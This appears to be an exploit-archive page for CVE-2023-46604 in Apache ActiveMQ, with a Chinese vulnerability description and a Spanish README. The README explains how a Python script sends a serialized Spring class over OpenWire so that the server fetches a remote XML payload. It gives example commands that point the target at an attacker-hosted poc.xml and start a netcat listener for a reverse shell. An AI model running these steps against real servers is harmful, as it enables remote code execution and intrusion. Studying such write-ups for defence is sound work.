关联漏洞
标题:
Apache ActiveMQ 代码问题漏洞
(CVE-2023-46604)
描述:Apache ActiveMQ是美国阿帕奇(Apache)基金会的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.15.16之前、5.16.7之前、5.17.6之前或5.18.3之前版本存在代码问题漏洞,该漏洞源于允许具有代理网络访问权限的远程攻击者通过操纵 OpenWire 协议中的序列化类类型来运行任意 shell 命令。
描述
El script explota una vulnerabilidad de deserialización insegura en Apache ActiveMQ (CVE-2023-46604)
介绍
Resumen Técnico del Ataque: CVE-2023-46604
El script explota una vulnerabilidad de deserialización insegura en Apache ActiveMQ (CVE-2023-46604) para lograr la ejecución remota de código en el servidor objetivo.
Descripción del Proceso de Explotación
Objetivo de la Vulnerabilidad:
La vulnerabilidad reside en el protocolo OpenWire de Apache ActiveMQ.
Permite la deserialización insegura de objetos, lo que puede ser aprovechado para ejecutar código arbitrario en el servidor.
Requisitos Previos:
Acceso de red al servidor ActiveMQ.
Un archivo XML malicioso (poc.xml) disponible a través de una URL accesible por el servidor objetivo.
Componentes del Ataque:
Script Python: Automatiza el envío del payload malicioso al servidor ActiveMQ.
Archivo XML (poc.xml): Contiene un bean de Spring que define la ejecución de un comando malicioso (por ejemplo, abrir una shell inversa).
Pasos del Ataque
Preparación del Payload:
El script construye un mensaje en hexadecimal que incluye:
El nombre de la clase Java: org.springframework.context.support.ClassPathXmlApplicationContext.
La URL del archivo XML malicioso.
El payload se convierte en una secuencia de bytes que puede ser enviada a través del protocolo OpenWire.
Envío del Payload:
El script abre una conexión de socket TCP al servidor ActiveMQ en el puerto especificado (por defecto 61616).
Envía el payload malicioso al servidor.
Ejecución del Código Malicioso:
El servidor ActiveMQ deserializa el objeto especificado en el payload.
Debido a la deserialización insegura, se carga y ejecuta el bean de Spring definido en el archivo XML.
Este bean ejecuta un comando malicioso (por ejemplo, una shell inversa) en el servidor.
_________________________________________________________
ejemplo de ejecucion:
- ***python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml***
- **nc -lvnp 9001**
este script fue copiado y modificado en español:https://github.com/evkl1d/CVE-2023-46604.git
文件快照
[4.0K] /data/pocs/7c8ef2dd1a90dbc008903fa8242797dd64ddb609
├── [1.8K] CVE-2023-46604.py
├── [ 665] poc.xml
└── [2.1K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。